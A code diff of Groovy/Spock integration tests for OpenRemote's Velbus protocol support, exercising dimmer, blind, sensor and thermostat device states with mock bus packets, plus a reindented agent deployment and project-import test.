+      assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH3_LEVEL") == 0
+    }
+
+    when: "a dimmer is locked for 1s"
+    device.writeProperty("CH3_LOCK", 1d)
+
+    then: "the dimmer should be off and locked"
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.LOCKED
+      assert device.getPropertyValue("CH3_LOCKED")
+      assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH3_LEVEL") == 0
+    }
+
+    and: "the dimmer should return to normal"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB BB 08 B8 04 00 00 00 00 00 00 77 04"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH3_LEVEL") == 0
+    }
+
+    when: "a dimmer is switched on indefinitely"
+    device.writeProperty("CH3_ON", -1d)
+
+    then: "the dimmer should be on and in normal state"
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.ON
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.ON
+    }
+
+    when: "we cancel the on timer"
+    device.writeProperty("CH3_ON", 0d)
+
+    then: "the dimmer should return to off"
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "a dimmer is locked for 1s"
+    device.writeProperty("CH3_LOCK", 1d)
+
+    then: "the dimmer should be disabled"
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.LOCKED
+    }
+
+    and: "the dimmer should return to normal after 1s"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB BB 08 B8 04 00 00 00 00 00 00 77 04"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    }
+
+    when: "a dimmer is locked indefinitely"
+    device.writeProperty("CH3_LOCK", -1d)
+
+    then: "the dimmer should be locked"
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.LOCKED
+    }
+
+    when: "the dimmer lock is cancelled"
+    device.writeProperty("CH3_LOCK", 0d)
+
+    then: "the dimmer should return to normal"
+    conditions.eventually {
+      assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
+      assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
+    }
+
+    cleanup: "put the device state back"
+    if (device != null) {
+      device.writeProperty("CH1", false)
+      device.writeProperty("CH2", false)
+      device.writeProperty("CH3", false)
+      device.writeProperty("CH4", false)
+    }
+  }
+
+  def "Blind Processor Test"() {
+
+    when: "A device property value consumer is registered for device address 97 (VMB2BLE)"
+    Object blindChannel1State
+    network.addPropertyValueConsumer(97, "CH1", { newValue ->
+      blindChannel1State = newValue
+    })
+    VelbusDevice device = network.getDevice(97)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMB2BLE
+      assert device.getBaseAddress() == 97
+    }
+
+    and: "the blind property values should be initialised"
+    conditions.eventually {
+      assert device.getPropertyValue("CH1") == BlindProcessor.ChannelState.HALT
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
+      assert device.getPropertyValue("CH1_SETTING") == BlindProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
+      assert !device.getPropertyValue("CH1_LOCKED")
+      assert !device.getPropertyValue("CH2_LOCKED")
+      assert !device.getPropertyValue("CH1_INHIBITED")
+      assert !device.getPropertyValue("CH2_INHIBITED")
+      assert device.getPropertyValue("CH1_LED_UP") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH1_LED_DOWN") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH1_POSITION") == 0d
+      assert device.getPropertyValue("CH2_POSITION") == 0d
+    }
+
+    when: "a blind channel set to down"
+    device.writeProperty("CH2", true)
+
+    then: "the blind should reach 100%"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.FAST
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.DOWN
+    }
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 61 08 EC 02 09 00 00 64 00 00 32 04"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
+      assert device.getPropertyValue("CH2_POSITION") == 100d
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "the blind is set to up"
+    device.writeProperty("CH2", false)
+
+    then: "the dimmer should return to 0%"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.FAST
+      assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.UP
+    }
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 61 08 EC 02 09 00 00 00 00 00 96 04"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
+      assert device.getPropertyValue("CH2_POSITION") == 0d
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "a blind channel is set to 50%"
+    device.writeProperty("CH2_POSITION", 50d)
+
+    then: "the blind should be at 50%"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.FAST
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.DOWN
+    }
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 61 08 EC 02 09 00 00 32 00 00 64 04"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
+      assert device.getPropertyValue("CH2_POSITION") == 50d
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "the blind is set to up for 10s"
+    device.writeProperty("CH2_UP", 10d)
+
+    then: "the blind should be up"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.FAST
+      assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.UP
+    }
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 61 08 EC 02 09 00 00 00 00 00 96 04"))
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F F8 61 04 00 00 04 00 90 04 00 00 00 00"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
+      assert device.getPropertyValue("CH2_POSITION") == 0d
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "a blind channel is set to down for 15s"
+    device.writeProperty("CH2_DOWN", 15d)
+
+    then: "the blind should be down"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.FAST
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.DOWN
+    }
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 61 08 EC 02 09 00 00 64 00 00 32 04"))
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F F8 61 04 00 00 08 00 8C 04 00 00 00 00"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
+      assert device.getPropertyValue("CH2_POSITION") == 100d
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "a blind is set to up"
+    device.writeProperty("CH2", false)
+
+    then: "the blind should start moving up"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.FAST
+      assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.UP
+    }
+
+    when: "we cancel the current up operation"
+    device.writeProperty("CH2", null)
+
+    then: "the blind should stop and the position should be somewhere between 100%-0%"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
+      def position = device.getPropertyValue("CH2_POSITION")
+      assert position < 100 && position> 0
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
+      assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
+    }
+
+    when: "a blind is inhibited for 1s"
+    device.writeProperty("CH2_INHIBIT", 1d)
+
+    then: "the blind should be inhibited"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.INHIBITED
+    }
+
+    and: "the blind should return to normal after 1s"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 61 08 EC 02 09 00 00 00 00 00 96 04"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
+    }
+
+    when: "a blind is inhibited indefinitely"
+    device.writeProperty("CH2_INHIBIT", -1d)
+
+    then: "the blind should be inhibited"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.INHIBITED
+    }
+
+    when: "the blind inhibit is cancelled"
+    device.writeProperty("CH2_INHIBIT", 0d)
+
+    then: "the blind should return to normal"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
+    }
+
+    when: "a blind is inhibited down indefinitely"
+    device.writeProperty("CH2_INHIBIT_DOWN", -1d)
+
+    then: "the blind should be inhibited from going down"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2_LED_DOWN") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.INHIBITED_DOWN
+    }
+
+    when: "the blind inhibit is cancelled"
+    device.writeProperty("CH2_INHIBIT", 0d)
+
+    then: "the blind should return to normal"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
+    }
+
+    when: "a blind is forced up for 5s"
+    device.writeProperty("CH2_FORCE_UP", 5d)
+
+    then: "the blind should be up and forced"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.FAST
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.FORCED_UP
+    }
+
+    then: "the blind should return to normal"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 61 08 EC 02 09 00 00 00 00 00 96 04"))
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F F8 61 04 00 00 04 00 90 04 00 00 00 00"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH2_LED_UP") == FeatureProcessor.LedState.OFF
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
+    }
+
+    when: "a blind is locked for 1s"
+    device.writeProperty("CH2_LOCK", 1d)
+
+    then: "the blind should be locked"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.LOCKED
+      assert device.getPropertyValue("CH2_LOCKED")
+    }
+
+    and: "the blind should return to normal"
+    messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 61 08 EC 02 09 00 00 00 00 00 96 04"))
+    conditions.eventually {
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
+      assert !device.getPropertyValue("CH2_LOCKED")
+    }
+
+    when: "a blind is locked indefinitely"
+    device.writeProperty("CH2_LOCK", -1d)
+
+    then: "the blind should be locked"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.LOCKED
+      assert device.getPropertyValue("CH2_LOCKED")
+    }
+
+    when: "the blind lock is cancelled"
+    device.writeProperty("CH2_LOCK", 0d)
+
+    then: "the blind should return to normal"
+    conditions.eventually {
+      assert device.getPropertyValue("CH2") == BlindProcessor.ChannelState.HALT
+      assert device.getPropertyValue("CH2_SETTING") == BlindProcessor.ChannelSetting.NORMAL
+      assert !device.getPropertyValue("CH2_LOCKED")
+    }
+
+    cleanup: "put the device state back"
+    if (device != null) {
+      //device.writeProperty("CH1", false)
+      device.writeProperty("CH2", false)
+      device.writeProperty("CH2_LOCK", 0d)
+      device.writeProperty("CH2_INHIBIT_DOWN", 0d)
+      device.writeProperty("CH2_INHIBIT_UP", 0d)
+      device.writeProperty("CH2_FORCE_UP", 0d)
+      device.writeProperty("CH2_FORCE_DOWN", 0d)
+    }
+  }
+
+  def "Analog Input Processor Test"() {
+
+    when: "A device property value consumer is registered for device address 2 (VMB4AN)"
+    Object ioSensor1
+    network.addPropertyValueConsumer(2, "SENSOR1", { newValue ->
+      ioSensor1 = newValue
+    })
+    def device = network.getDevice(2)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMB4AN
+      assert device.getBaseAddress() == 2
+      assert device.getPropertyValue("SENSOR1") == 1097.75
+      assert device.getPropertyValue("SENSOR1_TEXT") == "25.2°C         "
+      assert device.getPropertyValue("SENSOR1_TYPE") == AnalogInputProcessor.SensorType.RESISTANCE
+      assert device.getPropertyValue("SENSOR1_MODE") == AnalogInputProcessor.SensorMode.SAFE
+      assert device.getPropertyValue("SENSOR2"), closeTo(0, 0.0001)
+      assert device.getPropertyValue("SENSOR2_TEXT") == "0Unit          "
+      assert device.getPropertyValue("SENSOR2_TYPE") == AnalogInputProcessor.SensorType.CURRENT
+      assert device.getPropertyValue("SENSOR2_MODE") == AnalogInputProcessor.SensorMode.SAFE
+      assert device.getPropertyValue("SENSOR3"), closeTo(0, 0.0001)
+      assert device.getPropertyValue("SENSOR3_TEXT") == "0Unit          "
+      assert device.getPropertyValue("SENSOR3_TYPE") == AnalogInputProcessor.SensorType.VOLTAGE
+      assert device.getPropertyValue("SENSOR3_MODE") == AnalogInputProcessor.SensorMode.SAFE
+      assert device.getPropertyValue("SENSOR4"), closeTo(0, 0.0001)
+      assert device.getPropertyValue("SENSOR4_TEXT") == "0Unit          "
+      assert device.getPropertyValue("SENSOR4_TYPE") == AnalogInputProcessor.SensorType.VOLTAGE
+      assert device.getPropertyValue("SENSOR4_MODE") == AnalogInputProcessor.SensorMode.SAFE
+    }
+
+    when: "A device property value consumer is registered for device address 254 (VMBMETEO)"
+    Object tempCurrent
+    network.addPropertyValueConsumer(254, "TEMP_CURRENT", { newValue ->
+      tempCurrent = newValue
+    })
+    device = network.getDevice(254)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMBMETEO
+      assert device.getBaseAddress() == 254
+    }
+
+    and: "the device property values should be initialised"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_CURRENT") == 22.2
+      assert device.getPropertyValue("TEMP_MIN") == -0.6
+      assert device.getPropertyValue("TEMP_MAX") == 43.9
+      assert device.getPropertyValue("RAINFALL") == 0d
+      assert device.getPropertyValue("LIGHT") == 13797d
+      assert device.getPropertyValue("WIND") == 0d
+      assert device.getPropertyValue("CH1") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("CH2") == InputProcessor.ChannelState.PRESSED
+      assert device.getPropertyValue("CH3") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("CH4") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("CH5") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("CH6") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("CH7") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("CH8") == InputProcessor.ChannelState.RELEASED
+    }
+  }
+
+  def "VMBPIRO Test"() {
+
+    when: "A device property value consumer is registered for device address 8 (VMBPIRO)"
+    Object tempCurrent
+    network.addPropertyValueConsumer(8, "TEMP_CURRENT", { newValue ->
+      tempCurrent = newValue
+    })
+    VelbusDevice device = network.getDevice(8)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMBPIRO
+      assert device.getBaseAddress() == 8
+    }
+
+    and: "the device property values should be initialised"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_CURRENT") == 29.6
+      assert device.getPropertyValue("TEMP_MIN") == 20.0
+      assert device.getPropertyValue("TEMP_MAX") == 29.7
+      assert device.getPropertyValue("CH1") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("CH2") == InputProcessor.ChannelState.PRESSED
+      assert device.getPropertyValue("CH3") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("CH4") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("CH5") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("CH6") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("CH7") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("CH8") == InputProcessor.ChannelState.RELEASED
+    }
+  }
+
+  def "VMB1TS Test"() {
+
+    when: "A device property value consumer is registered for device address 5 (VMB1TS)"
+    Object tempCurrent
+    network.addPropertyValueConsumer(5, "TEMP_CURRENT", { newValue ->
+      tempCurrent = newValue
+    })
+    VelbusDevice device = network.getDevice(5)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMB1TS
+      assert device.getBaseAddress() == 5
+    }
+
+    and: "the device property values should be initialised"
+    conditions.eventually {
+      assert device.getPropertyValue("TEMP_CURRENT") == 29.9
+      assert device.getPropertyValue("TEMP_MIN") == 19.3
+      assert device.getPropertyValue("TEMP_MAX") == 30.3
+      assert device.getPropertyValue("HEATER") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("BOOST") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("PUMP") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("COOLER") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("TEMP_ALARM1") == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("TEMP_ALARM2") == InputProcessor.ChannelState.PRESSED
+      assert device.getPropertyValue("TEMP_TARGET_CURRENT") == 5.0
+      assert device.getPropertyValue("TEMP_MODE") == ThermostatProcessor.TemperatureMode.HEAT_SAFE
+      assert device.getPropertyValue("TEMP_STATE") == ThermostatProcessor.TemperatureState.NORMAL
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/velbus/VelbusProtocolTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/velbus/VelbusProtocolTest.groovy
@@ -52,206 +52,216 @@ import static org.openremote.model.value.ValueType.TEXT
 
 class VelbusProtocolTest extends Specification implements ManagerContainerTrait {
 
-    @Shared
-    static def MockPackets = [
-        // Module Type request for address 48 - return VMBGPOD Packets
-        "0F FB 30 40 86 04 00 00 00 00 00 00 00 00": [
-            "0F FB 30 07 FF 28 00 02 01 16 12 6D 04 00",
-            "0F FB 30 08 B0 28 00 02 31 32 FF 40 42 04"
-            //"0F FB 30 08 B0 28 00 02 31 32 33 40 0E 04"
-        ],
+  @Shared
+  static def MockPackets = [
+    // Module Type request for address 48 - return VMBGPOD Packets
+    "0F FB 30 40 86 04 00 00 00 00 00 00 00 00": [
+      "0F FB 30 07 FF 28 00 02 01 16 12 6D 04 00",
+      "0F FB 30 08 B0 28 00 02 31 32 FF 40 42 04"
+      //"0F FB 30 08 B0 28 00 02 31 32 33 40 0E 04"
+    ],
 
-        // Module Status request for address 48
-        "0F FB 30 02 FA 00 CA 04 00 00 00 00 00 00": [
-            "0F FB 30 07 ED 00 FF FF 00 00 8D 47 04 00",
-            "0F FB 31 07 ED 00 FF FF 00 10 8D 36 04 00",
-            "0F FB 32 07 ED 00 FF FF 00 00 8D 45 04 00",
-        ],
+    // Module Status request for address 48
+    "0F FB 30 02 FA 00 CA 04 00 00 00 00 00 00": [
+      "0F FB 30 07 ED 00 FF FF 00 00 8D 47 04 00",
+      "0F FB 31 07 ED 00 FF FF 00 10 8D 36 04 00",
+      "0F FB 32 07 ED 00 FF FF 00 00 8D 45 04 00",
+    ],
 
-        // Thermostat Status request for address 48
-        "0F FB 30 02 E7 00 DD 04 00 00 00 00 00 00": [
-            "0F FB 30 08 EA 00 00 10 38 18 00 00 74 04",
-            "0F FB 30 08 E8 18 32 2C 20 18 06 01 21 04",
-            "0F FB 30 08 E9 2A 2E 34 48 00 3C 05 C0 04"
-        ]
+    // Thermostat Status request for address 48
+    "0F FB 30 02 E7 00 DD 04 00 00 00 00 00 00": [
+      "0F FB 30 08 EA 00 00 10 38 18 00 00 74 04",
+      "0F FB 30 08 E8 18 32 2C 20 18 06 01 21 04",
+      "0F FB 30 08 E9 2A 2E 34 48 00 3C 05 C0 04"
     ]
+  ]
 
-    def "Check VELBUS agent and device asset deployment"() {
+  def "Check VELBUS agent and device asset deployment"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-        when: "the container starts"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
+    when: "the container starts"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
 
-        and: "a mock VELBUS agent is created"
-        def agent = new MockVelbusAgent("VELBUS")
-        agent.setRealm(MASTER_REALM)
-        agent = assetStorageService.merge(agent)
+    and: "a mock VELBUS agent is created"
+    def agent = new MockVelbusAgent("VELBUS")
+    agent.setRealm(MASTER_REALM)
+    agent = assetStorageService.merge(agent)
 
-        then: "the protocol instance for the agent should be created"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert ((MockVelbusProtocol)agentService.getProtocolInstance(agent.id)).messageProcessor != null
-        }
+    then: "the protocol instance for the agent should be created"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert ((MockVelbusProtocol)agentService.getProtocolInstance(agent.id)).messageProcessor != null
+    }
 
-        when: "the mock packets are assigned to the mock protocol"
-        ((MockVelbusProtocol)agentService.getProtocolInstance(agent.id)).messageProcessor.mockPackets = MockPackets
+    when: "the mock packets are assigned to the mock protocol"
+    ((MockVelbusProtocol)agentService.getProtocolInstance(agent.id)).messageProcessor.mockPackets = MockPackets
 
-        and: "a device asset is created"
-        def device = new ThingAsset("VELBUS Demo VMBGPOD")
+    and: "a device asset is created"
+    def device = new ThingAsset("VELBUS Demo VMBGPOD")
             .setRealm(MASTER_REALM)
             .addOrReplaceAttributes(
-                new Attribute<>("ch1State", TEXT)
-                    .addOrReplaceMeta(
-                        new MetaItem<>(
-                                AGENT_LINK,
-                                new VelbusAgentLink(agent.id, 48, "CH1")
-                        )
+            new Attribute<>("ch1State", TEXT)
+            .addOrReplaceMeta(
+                    new MetaItem<>(
+                            AGENT_LINK,
+                            new VelbusAgentLink(agent.id, 48, "CH1")
+                            )
                     )
             )
 
-        and: "the device asset is added to the asset service"
-        device = assetStorageService.merge(device)
-        def deviceId = device.getId()
+    and: "the device asset is added to the asset service"
+    device = assetStorageService.merge(device)
+    def deviceId = device.getId()
 
-        then: "a client should be created and the device asset attribute values should match the values returned by the actual device"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert ((MockVelbusProtocol)agentService.getProtocolInstance(agent.id)).network != null
-            def asset = assetStorageService.find(deviceId, true)
-            assert asset.getAttribute("ch1State").flatMap { it.getValue() }.orElse(null) == "RELEASED"
-        }
-
-        cleanup: "remove agent"
-        if (agent != null) {
-            assetStorageService.delete([agent.id])
-        }
+    then: "a client should be created and the device asset attribute values should match the values returned by the actual device"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) != null
+      assert ((MockVelbusProtocol)agentService.getProtocolInstance(agent.id)).network != null
+      def asset = assetStorageService.find(deviceId, true)
+      assert asset.getAttribute("ch1State").flatMap {
+        it.getValue()
+      }.orElse(null) == "RELEASED"
     }
 
-    def "Check linked attribute import"() {
+    cleanup: "remove agent"
+    if (agent != null) {
+      assetStorageService.delete([agent.id])
+    }
+  }
 
-        given: "the server container is started"
-        def conditions = new PollingConditions(timeout: 60, delay: 0.5)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
+  def "Check linked attribute import"() {
 
-        and: "a VELBUS project file"
-        def velbusProjectFileResource = getClass().getResourceAsStream(
+    given: "the server container is started"
+    def conditions = new PollingConditions(timeout: 60, delay: 0.5)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+
+    and: "a VELBUS project file"
+    def velbusProjectFileResource = getClass().getResourceAsStream(
             "/org/openremote/test/protocol/velbus/VelbusProject.vlp"
-        )
-        def velbusProjectFile = IOUtils.toString(velbusProjectFileResource, "UTF-8")
+            )
+    def velbusProjectFile = IOUtils.toString(velbusProjectFileResource, "UTF-8")
 
-        and: "an authenticated admin user"
-        def accessToken = authenticate(
+    and: "an authenticated admin user"
+    def accessToken = authenticate(
             container,
             MASTER_REALM,
             KEYCLOAK_CLIENT_ID,
             MASTER_REALM_ADMIN_USER,
             getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+            )
 
-        and: "the agent resource"
-        def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
+    and: "the agent resource"
+    def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
 
-        expect: "the system should settle down"
-        conditions.eventually {
-            assert noEventProcessedIn(assetProcessingService, 300)
-        }
-
-        when: "a VELBUS agent is created"
-        def agent = new MockVelbusAgent("VELBUS")
-            .setRealm(MASTER_REALM)
-        agent = assetStorageService.merge(agent)
-
-        then: "the protocol instance for the agent should be created"
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) != null
-            assert ((MockVelbusProtocol)agentService.getProtocolInstance(agent.id)).messageProcessor != null
-        }
-
-        when: "discovery is requested with a VELBUS project file"
-        def fileInfo = new FileInfo("VelbusProject.vlp", velbusProjectFile, false)
